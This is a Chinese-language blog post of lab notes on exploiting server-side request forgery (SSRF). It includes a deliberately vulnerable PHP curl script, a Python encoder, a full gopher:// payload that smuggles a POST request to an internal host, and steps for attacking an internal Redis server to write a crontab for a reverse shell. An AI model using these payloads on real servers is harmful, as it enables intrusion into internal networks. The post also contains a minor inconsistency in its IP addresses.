前言
SSRF(Server-Side Request Forgery ,服务器端请求伪造)
是一种由攻击者构造形成由服务器发起请求的一个安全漏洞
SSRF
的主要攻击目标为外网无法访问的内部系统。
本文记录下各种利用姿势
正文
测试环境
1 2 3
| docker pull vulhub/php 存在漏洞的机器: 172.17.0.3 redis服务器: 172.17.0.3
|
测试代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| <?php function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } $url = $_GET['url']; echo $url; curl($url); ?>
|
就是获取 url
然后用 curl
去获取页面内容
data:image/s3,"s3://crabby-images/0777c/0777c358081b6ce6c96bd21aa23f2b78eabcfa98" alt="paste image"
file协议读文件
data:image/s3,"s3://crabby-images/c1c70/c1c70782edc946774a28e132f6f92605aa6393eb" alt="paste image"
gopher 协议发送 TCP 数据
使用 gopher
协议我们可以向指定端口发送 tcp
数据。
比如向 172.17.0.1:8888
端口发送一个 POST
请求
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| POST /ssrf.php HTTP/1.1 Host: 192.168.211.131:88 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 pa=1
|
数据包内容保存到 payload.txt
, 然后用 url
编码
1 2 3 4 5 6 7 8 9
| import urllib def go(): f = open("payload.txt") content = f.read() print urllib.quote(content) if __name__ == "__main__": go()
|
data:image/s3,"s3://crabby-images/6ef93/6ef938caadd8d8ce9dc5c1271e7f7a73d678cc5b" alt="paste image"
然后用
1
| gopher://target_ip:port/_encodepayload
|
的格式来组成一个 gopher
请求
1
| gopher://172.17.0.1:8888/_POST%20/ssrf.php%20HTTP/1.1%0D%0AHost%3A%20192.168.211.131%3A88%0D%0APragma%3A%20no-cache%0D%0ACache-Control%3A%20no-cache%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/64.0.3282.186%20Safari/537.36%0D%0AAccept%3A%20text/html%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2Cimage/webp%2Cimage/apng%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Encoding%3A%20gzip%2C%20deflate%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.9%0D%0AConnection%3A%20close%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%200%0D%0A%0D%0Apa%3D1%0D%0A
|
如果是直接放到 burp
里面进行发包的话,要记得对 gopher://...
在进行一次 url
编码,原因是服务器对 HTTP
请求包会进行一次 url
解码,这样会损坏 gopher://...
的数据
data:image/s3,"s3://crabby-images/62548/625483702c901957b6bcccff836c3f9acc7e65e0" alt="paste image"
选中 然后 url
编码即可
data:image/s3,"s3://crabby-images/b820a/b820a0d23153f4594f6df6035a6bca9c2f704c16" alt="paste image"
可以看到成功接收到了 http
请求。通过 gopher
协议我们可以发送 POST
请求,所以对于内网中的很多 web
漏洞我们都可以利用了。
攻击 redis
首先探测 redis
服务
data:image/s3,"s3://crabby-images/a29ad/a29ad16e9b4c7c9fae687ab75196296e6eb89be9" alt="paste image"
使用 http
协议来探测即可,如果有 redis
服务监听在 6379
端口会返回
data:image/s3,"s3://crabby-images/f7a3a/f7a3a8c43f82f37be613e2fa1a7930ee788732f8" alt="paste image"
于是 枚举 IP
即可, 找到 172.17.0.2
开了 redis
然后生成 payload
data:image/s3,"s3://crabby-images/4bd92/4bd92f2514b495c85ca054a5175358286cbfa39c" alt="paste image"
这里有一个小坑 :
1
| 如果直接用 vim 写入 payload.txt, 它的换行符为 \n, 而 redis 的命令的换行符为 \r\n, 所以需要先用 unix2dos payload.txt转换一下。
|
data:image/s3,"s3://crabby-images/dea9b/dea9b2457be70832319aaf9978cf9ba8ecf7e66c" alt="paste image"
写入了 crontab
文件, 不过写入了为啥还是没有反弹 shell
相关链接:
http://www.angelwhu.com/blog/?p=427
http://wonderkun.cc/index.html/?p=670
http://t.cn/RK16Mgy
SSRF漏洞(原理&绕过姿势)
SSRF利用研究及总结
https://04z.net/2017/07/27/SSRF-Attack/
本站文章均原创, 转载注明来源
本文链接:http://blog.hac425.top/2018/03/16/learn_ssrf.html